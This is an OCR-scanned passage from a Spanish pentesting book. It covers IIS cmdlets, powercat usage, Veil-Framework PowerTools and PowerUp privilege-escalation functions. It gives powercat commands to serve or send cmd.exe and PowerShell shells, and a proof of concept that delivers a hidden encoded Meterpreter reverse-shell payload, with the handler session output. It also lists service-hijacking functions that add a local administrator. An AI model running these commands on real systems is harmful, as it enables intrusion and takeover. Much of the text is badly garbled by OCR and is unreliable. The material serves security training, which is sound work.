

asociadas a él 


Stop- Weh, m pP "7 


Detiene el pool de aplicaciones 


Start- Web, IppPool 
Arranca el poo/ de aplicaciones especificado 


Tahía 2. 14- 0, 
a 3.14: Cmdlets par 
, ara la gestión del js 
1 a gesti del pool de aplicaci 
+ l ae aplicaciones 


ro 
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La creación de una aplicación web dispone de 3 partes diferenciadas, en primer lugar se debe crear 


la aplicación, en segundo lugar asociarla a un poo! de aplicaciones que l 
realizar la copia de la carpeta que dispone el contenido del sitio web a la ruta de la aplicación. 


a ejecute y en tercer lugar D R 
escripción 


Arranca un sitio web 


Para crear una aplicación web se dispone del cmdlet new-webapplication. Los parámetros necesarios Detiene la ejecución d 
à | | - ám | a eJecución de un sitio w 
para la correcta creación agit apti, ste physicalpath y applicationpool. En el siguiente ejemplo se Tabla 2.16-Cmdi n sitio web 
| abla 2.16: Cmdlets para la gestión d ji 
a la gestión de sitios web. 


puede visualizar la creación de una aplicación W eb la cual se ejecuta en el pool indicado y cuya ruta 


física también se especifica mediante el parámetro physicalpath. 


"default web site” -Phys 


, 


a ge tión de l IS sitios I I F esde 1 5 re >] S > S > SOÍO C 
l es OS $ ` d sde 'erShe 25.1) 
ili E li i s- i = > | owerShell es realmente sencilla Se dispor e d C n cmeal 
! : i EP 5 eun Y le 

> : : > ^ và v ca / 7 Í Site, el c al es ne v-webftpsite. Los paramet OS mas 1 tiliz OS £ : ' 
jt L J > ados a Ic 

a are m 21 son name, L , physi 'alpath hostheader e ivadd; — ss x » i 
| > ejecutar el cmeiet s c € 201 ^ , A ress. 


icalPath C:NinetpubNuus 


IPS C:Ninetpub 94/26/2012 22:30:59 > Neu-WebApplication -nane i64p -Site 


-ApplicationPool poolPablo 


fipplication pool Protocols Physical Path 


Nane 


164p 


Ps C:Ninetpub 04/26/2812 23:43: 
PS address 127.0.0.1 3:43:27 > Neu-MebFtpSite -Nane pabloPTP -Port 21 -Ph 
-PhysicalPath C:\inet 
pubsuww —HostHeader m 
s yFT 


poolPablo http 


Fig. 2.37: Creación de una à olicación web. 
, State Physical Path 
== Bindings 
Started *NinetpubNuwu 27. 
ftp 127.8.8.1:21:nyPIP 


A continuación se especifican cmdlets dedicados a la gestión de las aplicaciones web contenidas en 
los sitios web. 
q » Bindings 
Stopped EAE y 
Scarpe essa tans ive vinnepubSUwernot 


Started CzNinetpubNwug 27.8 ts 
.8.1:21:myPTP 


Fig. 2,39: Creación 
g. 2.39: Creación de un sitio FTP en Powershell. 
} owershell. 


as en un sitio web 


Lista las aplicaciones web contenid 


t bat up es uno d OS proce S * d ` E 
S c ro 5 > te dl ] c enta un id 1 strador en s 
k | esos mas costoso y eli ado il que se enfrent 1 ur 1 1 
€ vital 


Elimina una aplicación web 
día a día. El módulo de IIS 
en Powershell dispone de un cmeallet para realizar el pr | 
a realize proceso de copia de 


Permite convertir un directorio virtual en una aplicación web 


seguridt d C L c a a Ce £ CES 
Y de la eL nfigur icion Se c C i aicno 28O 
C del TV ido I S realm nte ser cillc Il vara 100 li l 
- pro O yé jue 


Tabla 2.15: Cmdlets para la ge le vaciones web :on la s oro 
Tabla 2.15: Cmdlets para la gestión de aplicaciones Web con la simple ejecución del emdlet backup-webconfiguration s 
š m E . . ; — configuración del servidor. ifiguration se produce la copia de seguridad de |: 
Para la creación de un sitio web se dispone del emule! new-website. Las aplicaciones web se à seguridad de ji 
concentrarán en los distintos sitios web. A continuación se especifica un ejemplo para la creación PS C:Ninetpub 04/27/2012 88:11:35 > Back 
: H ackup-MebConf igurati 
ion 


cmdlet Backup-WebC: i 
D o "ati 
Proporcione deer ig Mon en ia posición 1 de la canalización d 
oporcione E oros Sinai 9 y ión de c 
er para obtener yuda). LEE E em) 


de un sitio web. 


C:Ninotpub 94/26/2012 23:87:17 > Neu-Mebsite -Nane i64 -Port B8 -HostHeader testi64 -PhysicalPath enu :SystenDrivesin 


etpubNtestió64 


1D Path 


P. 
2 Started C:NinetpubNtesti64 


Creation Date 


C:Ninetpub 84/26/2012 23:07:19 > Get-Website 27/04/2012 0:00:09 


ID State Ph 


Stopped enDrivezNinetpubwwwroot http * 
Started : etpubwtezti64 http *: 


PS C:Ninetpub 90472 = = 
p 7/2012 00:14:4 et~ on u 10 ackup 
5 > Get-MebC f igurat nB k 


i64 Greation Date 


88: 
88:testi64 


Fig. 2.38: Creación de un sitio web. 
27/04/2012 80:08:80 


acionados con la gestión de los 


A continuación se especifica una tabla que resume los emdlets rel 
sitios web en Powershell. Fig. 2.40: Creación del backup de la configuración d. 
a figuración de un sitio web 


Con q - A 
el C y ; ` 
i mdlet get webconfiet 


ASE irationback dr y dass 
à configuración de los sitios wel mo "x se listan los distintos archivos de copia de s lad d 
š Ue eb. El cmdlel re "owe : c seguridad de 
> = : : = Seguridad reali: $ emove-webconfigurationbackup e 
Lista los sitios web disponibles en MS guridad realizadas previamente sobre el servidor mbackup elimina las copias de 


Indica el estado de ejecución de los sitios web dispon 
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Capítulo ILI 
PowerShell puro: El arte del pentesting 


1. Introducción 


Desde hace unos anos PowerShell viene-en las versiones de Microsoft Windows y cada vez ofrece 
más posibilidades para poder interactuar con todo el sistema. ya sea cliente o servidor. Poco a 
poco han ido apareciendo herramientas que interactuando con los módulos que Microsoft ha ido 
desarrollando sobre directorio activo, SOL Server, Sharepoint, VIS, etcétera. pueden ayudar a los 
pentesters en una auditoría. La fuerza de PowerShell es que está basado en .NET, por lo que tiene 
todo el potencial del framework al alcance de la consola. Además. ser una consola de objetos le da 
una fuerza importante a PowerShell. 


Durante los últimos años se han ido desarrollando diversos scripts, incluso algunos frameworks. 
orientados a la auditoría. Las herramientas están desarrolladas para dar soluciones en diversas 
temáticas como es la respuesta ante incidentes, la fase de post-explotación de un pentest, evasión 
de elementos de seguridad como puede ser un antivirus, la fase de recopilación de información. 
orientadas a la escalada de privilegio en la fase de explotación, etcétera. A continuación. se enumeran 
algunos de los /rameworks y herramientas más conocidas y utilizadas: 


- La navaja suiza traducida y mejorada a PowerShell denominada powercar. 


- PowerTools es una parte del famoso framework Veil-Framework. Con este conjunto de 
herramientas se podrá llevar a cabo chequeos de configuraciones erróneas en máquinas y 
realizar escaladas de privilegio. Además, permite recopilar gran cantidad de información 
sobre los dominios Microsofi, usuarios, equipos, recursos compartidos, etcétera. 


- Posh-SecMod. Este conjunto de seriprs desarrollados por Carlos Pérez proporcionan 
funcionalidades para recopilar información, automatización de escáneres como Nessms. 
funcionalidades de post-explotación, funciones para auditar el sistema. funciones para 
interactuar con la API de VirusTotal, Shodan o Metasploit. 


- PowerSploit. Este framework dispone de scripts para llevar a cabo ejecución de código 
sobre máquinas Windows, recopilación de información, bypass de AV. modificación de 
scripts, generar persistencia, realizar escaneos de red, etcétera. 

- Nishang. Este framework proporciona scripts para interactuar con backdoors a través 
de PowerShell, ejecución de código, funcionalidades para realizar escaladas de privilegio, 
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recolección de información, realización de escaneos de puertos, realizar fuerza bruta, 


pivoting, etcétera. 
- Otras herramientas. Ca 


PowerShell. En este capítulo se podrán estu 
ayudarán al pentester a lograr el éxito en entornos Microsoff. 


da vez son más las herramientas creadas para ejecutarse en 
diar una gran cantidad de ellas. las cuales 


loit tiene algunos módulos que permiten apoyarse 


Además, el framework de explotación Metasp 
explotación. Este hecho ha impulsado el éxito de 


en PowerShell para llevar a cabo la fase de post- 
PowerShell entre pentesters. 
os entornos Microsoft todo puede ser 


Por último, el pentester tiene que tener en cuenta que en | 
la consola pasará más desapercibido, 


realizado a través de PowerShell, y que el código ejecutado e 
pudiendo llevar a cabo la evasión de AV. 


En algunos casos, el pentester no contará con herramientas que poder utilizar, no podrá tener un 
nmap, satori o una foca, pero casi siempre tendrá disponible la PowerShell. 


2. Powercat: la navaja suiza 


La herramienta necat es una de las más utilizadas en el mun 
versatilidad y flexibilidad. Entre las numerosas cosas que se pueden llevar a cabo con la herramienta 


se muestra como ejemplo la posibilidad de conectar con diversos servidores, asociar una shell o 
cmd a un puerto concreto o colocarse a la escucha para recibir conexiones y sesiones. Mercat suele 
utilizarse para realizar operaciones de depuración de aplicaciones de red, aunque viéndolo desde un 
punto de vista más oscuro. podría ser utilizado para abrir puertas traseras o backdoors. 


do del hacking, ya que tiene una gran 


A continuación se muestran diversos parámetros que son utilizados en nelcal: 


i e cerrará. El puerto a 


Netcat se coloca a la escucha. Recibirá una conexión y s 
abrir se especificará con el parámetro -p 
se pondrá a la escucha, o sobre el que se realizará 


Especifica el puerto en el que 
la conexión remota, dependiendo de si netcat se utiliza para generar una 


conexión o para recibirla 
El puerto se abre en UDP y no en TCP 


Se utiliza con el parámetro —/ y -p y hace que no se cierre el puerto tras una 
conexión, por lo que permanece abierto 


Modo verbose 


Tabla 3.01: Algunos parámetros de netcal. 
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owercat es un scri, i ` a las i i 
P. inge n p que implementa las funcionalidades de mercar. incluso aumentándolas. El 
script presenta una función denominada K i t e 
cript pre powercat, la cual puede recibir distintos pará 
ees y R : istintos parámetros con 
f rra des idénticas a las de ne/cat. Para obtenerlo se puede descargar de la ei direcció 
URL hrips://github.com/besimorhino/powercat. "— 


m ^ puede hacer con powercar? La realidad es que el número de parámetros de powercat respect 

a ^ cat es mayor, por lo que a priori, se pueden realizar más acciones. A netcat se le d loe 
navaja suiza, pero powercat aumenta las funcionalidades de ésta. Con powercat se s ide aua : 
una conexión en modo cliente a un servidor remoto, o por otro lado crear un 7i Aem : Sis 
colocarse en modo servidor y esperar conexiones. Estas acciones son idénti NIU idu € 
básicas que se pueden llevar a cabo con necat. — 


owerca | i i : 
n E : La ad enviar y servir shells. Es decir, el usuario puede dejar powercat a la escucha 
c se reciba ión servi $ e 

i v una conexión servir una shell, o por el contrario realizar una conexión cont : 
neteat o powercat remoto y enviar una shell, incluso una PowerShell OO 


Powercat permi iz i 1 

m Ea Pe si — — y descarga de ficheros contra otro powercat. Además, se permite 

nn ar br de iid r DNS. Otra funcionalidad interesante que proporciona es la 
s 'elay, incluso relay entre conexiones de di na, i 
f > s de diferentes protocolos alti 

— M i n | protocolos. Por ültimo, se 
v b en cuenta que esta magnífica herramienta permite realizar un escaneo básic de 

p s - A continuación se muestran los distintos parámetros de powercat: —-— 


Parámetro i 
Parámetro | Descripción 
p" M 
Se deja el script a la escucha de conexiones 
4 - A s 
|^ o | Se utiliza para realizar conexiones en modo cliente desde powerca/ 
m 


Se especi J t 
pecifica el puerto, tanto para la escucha de conexiones como para conectar 
con un servidor remoto 


Ejecuta el comando que se indique a continuación 
-ep i 
| p | Ejecuta una PowerShell 


L 2 — ] Relay, cuyo formato es — Icp:ip:puerto 
| «4 | Tráfico bajo el protocolo UDP 


Ruta che ili 
al fichero de entrada, puede utilizarse en la transferencia de archivos entre 


dos scripts de powercat 


Indic i ili 
a la ruta al fichero de salida, puede utilizarse para indicar la ruta dónde se 
escribirá el fichero en una subida 


Transferencia de tráfico sobre protocolo UDP (dnseat2) 
Repetición del proceso, evitando que se cierre el puerto 


Pentesting con PowerShell NN. n > 
: Capitulo H1. PowerShell puro: El arte del pent 
- y det pentesting 


113 


Dar y recibir shells 


Una de las funcionalidades más 

pe | ^ ilidades más interesantes de powercat es pod - 

>| otro extrem ari TP er recibir all 

e À e 10. Para poder servir una shell se puede utilizar la i ( Ion shells o enviarlas hacia 

me | oven > E € instr O " m 

en el que se escucha? -e cmd.exe. De esta forma, cuando el ir acus sb d 
, e 9 el usu 


y la dirección IP dónde se sirve la eme exe, se podrá ejecut 
Xe, á ejec 


Genera un payload encodeado 
- =p «puerto 
la mi ario se conecte al puerto indicado 

con la misma instrucción, cambianc . ar comandos remo — 
| cual periit cción, cambiando el parámetro —e, el cual es genéri motos. Por otro lado. 

el cua > e servir una PowerShe " E À ual es genérico, por el paráme 
instrucción a ejecutar es Shell, se podría obtener un control má o de 
E a ejecutar es powereat -l -p «puerto en el qi as potente de la máquina. I 
21 que se Y 


Tabla 3.02: Parámetros de powercal. 


Como se puede visualizar, powercat presenta varios parámetros más que nerca por defecto, 


ampliando las funcionalidades de 


éste, y simplificando algunas acciones. 
escucha las peticiones? -ep a 
'p. 


rootikali:-£x nc 192.168 
een bi d dd 


opyright (C) 2013 Microsoft Corporation. Ali 


rights reserved. 


Conexión simple 


Con powercat se puede crear una conexión, 
conexión contra un servidor remoto se puede ejecutar la siguiente 


S C:AUsersip a 

br \pgonzalez\ Desk A i 

llpaths\pablo .gonzalez top\powercat-master> whoami 
C: \Wsers\ EE p 


Fig. 3.02 Cone ión 1 unma po a PSCHCNA que Su una Po "Miet 
j ü» mnexión « N aiiin / 
[4 vercat a la escticl. 
" ie sim na P y» 
1 Un Hn werShell 


por defecto por el protocolo TCP, con otros servidores, 


Cuando el usuario quiere crear una 
instrucción powercat =C «dirección IP» -p «Puerto remoto a la escucha». En el caso de que se 
quiera utilizar powercar como servidor, se debe ejecutar la siguiente instrucción powercat -l -p 
a la estudiada 

, / -e cmd.exe " «dirección IP remota } 
En este ejemplo, se parte que una máquina Linux "e e neun iN das ciae 


Y9000, y S ! IS Á Owe? at 
1, y desde Win lo 5 el usuar envía al IWE Shell ha 


ámetro opcional que permite ca biar e Cómo enviar una she on 
imetro opcional que pe e cambiar el ( ae = shell o PowerShell a un servidor? Ésta sería | ió 
anteriormente. En este caso. la i . ? Esta sería la acción invers: 
èn este caso, la instrucción a ejecutar es poi que tiir 
Jecutar es powercat —c 


merto en el que escuc le 
l que escucha el equipo remoto 


puerto por el que se escucha conexiones>. Hay un par 


formato de la salida de datos. Este parámetro es el —o, dónde se puede especificar string o bytes. 


En este primer ejemplo se utilizará la aplicación n/d. la cual permite tomar el control de la consola 


avés de powercal, mediante el uso de los parámetros instrucción ejecutad 
" ejecutada nc —/ —-p 


de Metasploit en remoto. Se conectará a msfd a tr 
p. a el servidor a la escucha ] 


PS C:NUsersNpgonzalez*Des 


ey - 
:NüÜsers*NpgonzalezNDes topNpouercat 


-naster 


ktopNpovercat-master? Inport-Module .Npovercat . ps1 Npowercat 
z psi 


Advertencia de seguridad 


Ejecute sol 
5 o los scri 
s pts de c i 
Internet pueden ser ütiles, x AEDEM dos 
mos 


¿Desea ejecutar C:NU 
IN) No ejecutar IZ Sers*NpgonzalezNDesktopNpouer = 
Mr m ee N MU MEN MM 
1 cas DesktopNpouercat-mast "2 
M E usersebsonzalezNDesktopNpouercat-naster? 
p 9000 en a ezNDesktopNpouercat-master? powercat 19 

Jer =e 2.168.56.182 


Advertencia de seguridad 
Ejecute solo los scripts de confianza. Los archivos procedentes de 


Internet pueden ser útiles, pero algunos archivos podrían dañar su equipo. 
¿Desea ejecutar er tiles. sonzalezwDesktopspowercat-masterspowercat psi? 
IN] No ejecutar [Z] Ejecutar una vez [U] Suspender [?1 Ayuda 


(el valor predeterminado es "N"5:Z 
S Cis eerbNpgonzalezNDesktopNpouercat-master? powercat -c 192.168.56.102 


archivos pr 

: ocedentes d 

: e 
archivos podrían dañar su equipo 


G* The following modules could not he loaded? : 
folloving mopro/nsf 3/nodules/payloads/singles/vinde m A 
1 acl bind tcp.rb: LoadError cannot load such file — msf/core/handler/binó 


lis 


Fig. 3.03: Envio de u 


na PowerShe i 
Shell a una máquina Linux a la escuch 
! 108 con nmetcal. 


cousayt* 
metasploit > Transferencia de archivos 
p 


» 
Owercat m, Pret 
ará proporciona la posibilidad de realizar tr 
tará de equipo client es maé 
e y otro de ser id . Para i 
se "do pi . ervidor, Par: " lar ic a 
puede ejecutar la sicul ra enviar un fichero desde un quipo 1 tre 


7 Vm ente OC 
Large pentest? List, sort, group, tag and search your hosts and service escucha el eou; ente instrucción powerceat < «dire, > 
sploit Pro -- type *go_pro? to launch it nou. i quipo remoto -i direccion (P remota 
MA escucha 
G, 


ansfere “ae ^ T 
ansferencias de archivos entre dos sistemas. I 
DS S nas. Ul 


és de powerca 


ruta local del fichero a ems -p «puerto en el qi 
por ejempl -— el fichero a enviar». De este modo el si 
=[ metasploit v4.8.2-20148010101 [core:4.8 api:1-91 Visualizarsc en la ; plo, a través de powercat o netcat recibirá el eis HOOD Cl SISte 
1251 exploits — 682 auxiliary — 198 post € en la imagen. cat recibira el contenido del 

[ 325 payloads ~- 32 encoders — 8 nops 
( j] "5 nc - D 50001 
od del fichero a 


powercat!|] 


Pilo 3.04- Fhvin rel 
8. 3.04* Envio del contenido de un fichero a tra 
C a av 


1a que este 


H +] a 
ichero como puede 


Fig. 3.01: Conexión a Metasploit a través del cliente powercat. 


3s de powercat 


BN h  3- A A MÀ À M 
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cat ^1 -p «puerto en 


Para la recepción de un fichero se puede ejecutar la siguiente instrucción power 
-. De este modo, si a 


el que se escucha> of <ruta local del servidor dónde almacenar el contenido> 
través del socke! se envía cierta información, ya sea texto © un binario. se almacenará en la ruta y la 


extensión indicada en el parámetro of. 


Escanear puertos TCP con Powercat 
o básico de puertos abiertos a través del parámetro — 


Verbose. La siguiente instrucción (< powercat € <dirección IP 
remota a escanear> -p $_ -l 1 -Verbose —d] permite realizar un escaneo de puertos abiertos. Como 
ejemplo práctico se propone la ejecución de esta instrucción (80) | % /powercat —c 192.168.56.102 
-p3_-11- Verbose -d}, la cual ofrecerá una salida como la que se puede contemplar en la imagen. 


Con powercat se puede realizar un escane 
«puerto o listado de puertos?) | % 1 


IPS Civlserss EnzalezwDesktopwpouercat-master? (BB) | 7 Xpouerca 


o 56.102 -p $— -t 1 -Uerbose — 
DETALLADO: Set Stream 1: ICP 
DETALLADO: Set Stream 2: Console 
DETALLADO: Setting up Stream i1... 


: Connecting..- 
: Connection to 192.168.56.102:80 [tcp] succeeededt 


: Setting up Stream 2 
: -d (disconnect> fictivated. Disconnectingd.-- 


puerto $0 de una máquina remota con powercal. 


" s "" 
PoC: Descarga y ejecución de Shellcodes desde Powercat 
En la siguiente prueba de concepto se và a utilizar powercat para obtener la instrucción necesaria 
para ejecutar una shellcode. en este caso un Meterpreter inverso, encodeada con la que tomar el 
control del equipo dónde se encuentra el pentester. En este escenario se cuentan con las siguientes 
máquinas: 

- Máquina Kali Linux con Social Engineering Toolkit para generar la shellcode encodeada. 


- Máquina Windows 8 en la que se servirá, a trav és de powercat, el fichero creado en la 


máquina Kali Linux. 
- Máquina Windows 8.1 en la que el pentester lanzar 


el fichero de la máquina Windows 9. 


á powercat con la intención de obtener 


or obtiene el contenido del fichero que se sirve en la máquina Windows 8, se 
PowerShell de la máquina Windows 8.1. Tras ejecular esta 


a dirección IP dónde se haya configurado. 


allar los pasos. En primer lugar, Y tras 
ervidora, €? 
¡ente formé 
nop indici 
ntormo 


Una vez el penteste 
copiara y pegará la instrucción en una 
instrucción se obtendrá el control de la máquina en l 


Tras el breve resumen de la prueba de concepto se va à det 
generar el fichero con Social Engineering Toolkit se debe pasar el fichero a la máquina $ 
este caso la máquina Windows 8. El fichero contiene una ünica instrucción con la sigu 


PowerShell -nop windows hidden -noni —enc Es 
que no se utiliza un profile. El parámetro -windows indica si la 


hellcode encodeada>. El parámetro 
instrucción se ejecutará en un € 


on 


Hay 
4y que tener en c 
1 Cuenta que cue : i 
"ct jue cuando se recibe el contenido a tr 
Un note, s 
tepad y se supriman los s 


Tras la ej i 
5 la ejecución de | 


Me te. rp re 
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visible o no. El parámetr ; 
QU metro - ; : 
pr Ad pri tro noni indica que será una ejecució à . 
c indica el código a ejecutar encodeadi on no interactiva, 
:*NÜsersNpgonzale CACAO. 


Y por último. el 


zNDeskto 
; pNpovercat-master> Import-Module .w 
Bivestoncis qe semteilad -Npouercat.ps 
jecute solo los scri 
los scripts 7 
e do Interi5t ee lania. 
P s podrían dafiar s L 
:Wsers\pgonz A su equipo. ¿Des ; 
[N] No s pgonzalezsDecktopspouencat-nasterpouerc 
[?] fiyudaXel val Ejecutar una vez tu pouercat.psi? 
IPS C: NUsersN alor predeterminado es "N" 1 Suspender 
PS Cr Users pgonzalez Desktop rpowere: d 
IPS ed txt Saen 
il zalez skt E uz 
ersNpgonzalezNDeskt Mesktoprpovercat-master 
PS A eode -txt Sap ster? powercat —1 -p 9888 —i 
door cat master) CMS i C:Nls 
Ed ode.txt —rep "cat -l -p 9888 $ 
—i C:NUS 


Los archi 

Z ‘chivos 

o LI 1 > 

ser ütiles, pero algunos 


-master? pouercat —1 -p 9888 -i C 
-i C:NUs 


Fig. 3.06: Powercat sirve un fich 
chero con la instrucción para ejecutar Mi 
e ar Meterpreter: 


En la imagen se ede visuali z 
ag se puede visualizar R i 
sualizar C se sir 
shellcode en su interior. La instr i-e se sirve con powercat el fichero co i 
or. La instrucción a ejecutar es powercat —/ o con la instrucción y la 
eje es cat —i -p «pue Ls 


-į <ruta local dónde se enc ; F 
al dónde se encuentra el fichero> rto en el que se escucha 
G is ULP 


Desde là máquina Wi S 
sde là ma Windows 8.1 
s 8.1 el pentester pue 

id as jw ster puede lanzar powercat para crear ui 
| M aa de a crear una conexión y recil 
da ena forma de evadir ciertos y recibi; 
: antivirus. Una vez se i vpisa amie idad 
posteriormente copiar y —— es se obtiene el contenido se puede alma tei) Ea ln 

y pegar en la PowerShell —Ü€ VES 

werShell. enero y 


¿UsersiAdmin1st 

PS C:NUsersMAdmini ratoriDesktop> Import-M 
powershell AO: o oes KEOD oar aE R Toa MONETE psi 
GUADAAZADIAL gBk AAA -noni -enc JAAACAAPQASACCRIA -p 9000 
EAE AE A PASQUA SA E EPA RAP ADAB PARI Q A AQ 
EEAbABSAGBAYWBRAHQAaQBVAGA AVABS AHAAZ( sAHAAQQBkAGQACQBAHMACUAS CAAZQB4A 
SUA i VAG4AV; AGQACgBTAHM j HQ. 
e A COBUAGUADAAZADIAL g AE AS AERACOBA 95 LAHMACWASACAAdQBpAGAA 

AdAB 1AFQAaAByAGUAYQBKACq, AXQB 


AY 


AgAHMAdABhAHQA 
; aQBJACAA 
| BoARTAZQBhAGQARISOAQ 
pa AGEACgBOAEEAZABKAHT 
a EX EA ene 
AO Arana 
| AATAFCA MAMgAT, AGEADQE AGUATAAAGOA 
TAEJAYQE TAGU ATAATAF CAaQBUADMAMgA AC AALQBUAGEADOS TAHMA CABPA CHASMA EA CO A 
AC AGN AgAF 


wADAA ; AB lAFSAXQB Ww 
LAAWAHGAMAAWACWAMABAADAAMAASADAACARGADAA AMA SAXQBdACQAcwB JAC 
adi AD) AN > ACV AM 


OAAeAA4AGIALAAWAH 
AHgANQAyACWwAMAB4ADN A 
POCA wAHgAOAAS ACwAMABA. 
7 AGIALAAwWAHGANQA; Ani 
y ACWAMAB4ADAA 


Fig. 3.0 Obtención de shellcode cr 10 HeYton ca. N 7" 
7 code creando conexión con el sem ich 
t NCPVICOF. 


ner saltos de línea dá -— m o 
s de línea dónde antes no existí de pov ercat, el código —" 
ültos.de Ti stían. Por esta razón, se recomienda qu ncodeacdo 
altos de líne: S ZÓN, $ E ni 
ea, quedando una sola linea de! código l semuis en 
go encocdeado. 


a instrucción er £ 

1 una Power. hell S e 1 cone n inversa hac 

en Soci DET 4 PS 4 se crea la con IÓ i ye | 

I 3 [4 ial Engine el Ing Toolkit. I l contro "^ «is 

ter ue es ejer d r A K OI ol es devue to 
q ces ejecuta oen la maquina con Window y & 1 


configurada 
a la dirección 


a través de una sesión de 


E — M3 | | |  À À | 
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exploit (handler) > exploit 


Started reverse handler on 192.168.56.101:4444 


[+] Starting the payload handler... 
to 192.168.56.103 


[*] Sending stage (770048 bytes) 
(192.168.56.101:4444 


ssion 1 opened -> 192.168.56. :49450) a 


[*] Meterpreter se 
t 2015-06-07 16:09:16 40200 
meterpreter > geruid 
Server username: pshellNAdministrator 
meterpreter > sysinfo 

: PSHELL 


Computer 
Windows 8.1 (Build 8600). 


os 
Architecture : x86 
System Language : en US 
Meterpreter x86/win32 
terpreter > 
Fig. 


3.08: Obtención del control remoto de una máquina a través de Pow erShell. 


3. Veil-Framework 


es un conjunto de herramientas que permite prep 
ecanismos de detección. ¿De qué const 


Veil-Framework arar diversos ataques centrados en 
la evasión de antivirus y m 
día esta framework tiene: 

Veil-Evasion. Una herramienta que permite gener 
o diversas técnicas y lenguaj 


a hoy día Veil-Framework? Hoy 


ar pavloads con un enfoque de evasión 
de antivirus, utilizando para ell es de programación. 


Veil-Catapult. Permite trabajar con payload de tipo psexec-st) le. 


i 


[ 


Veil-Pillage. Funcionalidades para post-explotación. 


nta en PowerShell que permite escalar y obtener 


- Veil-PowerView. Una herramie 


información en entornos Windows. 


la siguiente dirección URL de github htps://github. 
e Veil que pueden ser utilizadas en 
En este apartado se hablará de 
a través de 


Veil-Framework puede descargarse desde 
com/Veil-Framework/. En este libro se hablará de las partes d 

PowerShell con el fin de llevar a cabo acciones de un pentesting. 
las PowerTools. centrándose en explicar las posibilidades que ofrece y en ejemplificar 
or Tools? 


pruebas de concepto. ¿Qué elementos componen las Pow 


ncias de comandos, los cuales 


Conjunto de scripts que contienen secue 
arlos y publicar resultados à 


utilizan un patrón comün, con el fin de ejecut 

través de un servidor web 
al usuario una amplia variedad 
rBreach focaliza 


PewPewPew 


Conjunto de backdoors que proporcionan 
alar una backdoor en un sistema. Powe 


o persiste después de un reinicio 


de métodos de inst 


PowerBreach 
en memoria y n 
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PowerPick 


del pente 
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Descripción 


Este proyecto fi i 
: ecto focaliz: jecució [ 
= ? Kcti: focaliza en la ejecución de funcionalidades de Pei Shell 
DII a ^f" d E > ili q : " * | 
ecesidad de utilizar PowerShell. Utiliza ensambl Ef rum. 
: a ensambla 
ejecutar scripts de PowerShell 


dos NET para 


Herramienta que permite realizar escalad 


"ra i as de privilegio en sistemas 
"ios IAS QS à; Í sistemas 
e 2 ntiene varios métodos que identifican v se ap | " d 
servicios vulnerable ) ] dieu Sauer dun 

nerables, DLLs que permiten aprovecharse, confi m 


guraciones 


de registro vulnerables, etcétera 


Powe Yi, ; le ramenta er E Jern s o C e 
| c rower She li que [ ute obter er una ituaci on le j 
5 Ç venta 


en la f él az € 
d y lon nios Windows Orien d ) a Ct > Dii t 
re C tado 4 ectol 


Tabla 3.03 Elen s forman PowerTools de Veit- ramewaork 
3.025; Cmentos que 
si nar Power Is é eil-Fra € Fi 


PowerUp 


PowerUp es SIE. 
p es un conjunto de herramientas de 
en sistemas Micros fi e" ME s permite realizar ladas d 
as Microsoft Windo "i i E Á alzar escaladas de privilegios 
serito conien x ; ws debido a malas configuraciones o debilid: caladas de privilegios 
enen varios métodos para identificar y Š 8 O debilidades. Este conjunto de 


, ali: A V apr > "Qo 2 . 
como realizar DLL Hijacking, detectar confie M y aproy echarse de servicios vulnerable 
PE PRESS x e £ guraciones errónez E x: ` d$ 
ocalizz NEM Sug es erróneas en el registro E s 
C ir oportunidades de escalada en el sistema. Desarroll ieas en el registro de Window: 
a a. DHEOSarro 


anteriormente, forma parte de Veil-Framework 
A. 


* y poder 


e ) ! m f 1 
ido por (& harnmjOy y. como se mencioné 
» 3 no 
En PowerUp se pue 
Up se pueden encontrar diferentes categorías, como 
' CE as, como son 
Enumeración de servicios y debilidades 
- Aprovechamiento de debilidades en servicios 
i t VICIOS. 
DLL Hijacking. 
- Chequeo de configuraciones en el registro 
- Helpers y otros. l 
Para la enu ic 
ara la enumeración de servic ili 
imeración de servicios y debilid 


ades se di 'n de 
e disponen de varias funciones. A contim 
^ i tacion 


SC 


muestra una brev ipció 
lestra una breve descripción de ellas: 


Descripción 


Devuelve el li i 
el list: servicio i 
tado de servicios que no tienen entre comillas lo 
ç 05 


paths dónde se encuentra el binario 


je SI . ate "TET 
Devuelve el listado de servicios dónde el actı 


ial usuario puede 
i dn ar sue cde 
sobrescribir la ruta del binario 


Devu vee list d ) le se CIOS que l act 1 uario pue 
c | stado C V IOS ] e l il us ri Į i ] 
I t; J ac 


modificar 


Tabla 3.04: $ NCIONES par enumeración seri y ah 
» WINCIONE: t eue se Cit € ates 
es para la en eración d rvicios v debilidad. 
es, 
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Estas tres funciones son importantes para poder detectar configuraciones erróneas en servicios o 
en su instalación. La función Get-ServiceUnquoted permitirá detectar rutas de binario que no se 
encuentran entre comillas, por lo que si se crease un binario con el mismo nombre que la ruta hasta 
su primer espacio, se podría ejecutar dicho binario. Por ejemplo, supóngase que se tiene un servicio 
A, cuyo binario se encuentra en la ruta program files (x86) binario.exe. Al no estar entre comillas, 
la primera ocurrencia que se va a buscar es program.exe, por lo que si se escribe dicho binario en 


esa ruta, cuando el servicio arranque se ejecutará el binario con el privilegio que el servicio tenga. 


La función Get-ServiceEXEPerms permite detectar qué binarios pueden ser sobrescritos por el 
usuario que lanza la función. Esto es algo muy interesante en un pentesting, ya que ya sea con acceso 
local o acceso remoto a la máquina, se podría ejecutar código arbitrario a través de esta debilidad. 
Supóngase un servicio A, cuyo binario se encuentra en la ruta ¡program files (x86) empresa binario. 
exe. Si los permisos de este binario no han sido bien configurados, el usuario sin privilegio podría 


sobrescribirlo, por lo que podría obtener privilegio. 


La función Get-ServicePerms permite detectar qué servicios pueden ser modificados por el actual 
usuario. Esto puede hacer que un atacante cambie la configuración del servicio provocando que se 
pueda lograr un mayor privilegio. Para el aprovechamiento de debilidades en servicios se disponen 


de varias funciones. 


A continuación se muestra una breve descripción de ellas: 


Descripción 


Modifica un servicio modificable para crear un usuario y 
añadirlo al grupo de administradores 


Se crea un binario que lanzará un servicio y añadirá un usua- 
rio perteneciente al grupo administradores. El usuario por 
defecto es Jhon y su contraseña Password123!, aunque hay 
parámetros para cambiarlos 


Write-UserAddServiceBinary 


Se crea un binario que permite ejecutar un comando de cmd 


personalizado à través de la creación de un servicio 


Reemplaza el binario de un servicio por uno que añade un 
usuario administrador local al sistema 


Write-CMDServiceBinary 


Reemplaza el binario de un servicio con uno que ejecuta un 
comando personalizado 


Restaura un binario de un servicio reemplazado anteriormen- 
te por el binario original 


Restore-ServiceEXE 
Tabla 3.05: Funciones para el aprovechamiento de debilidades en servicios. 


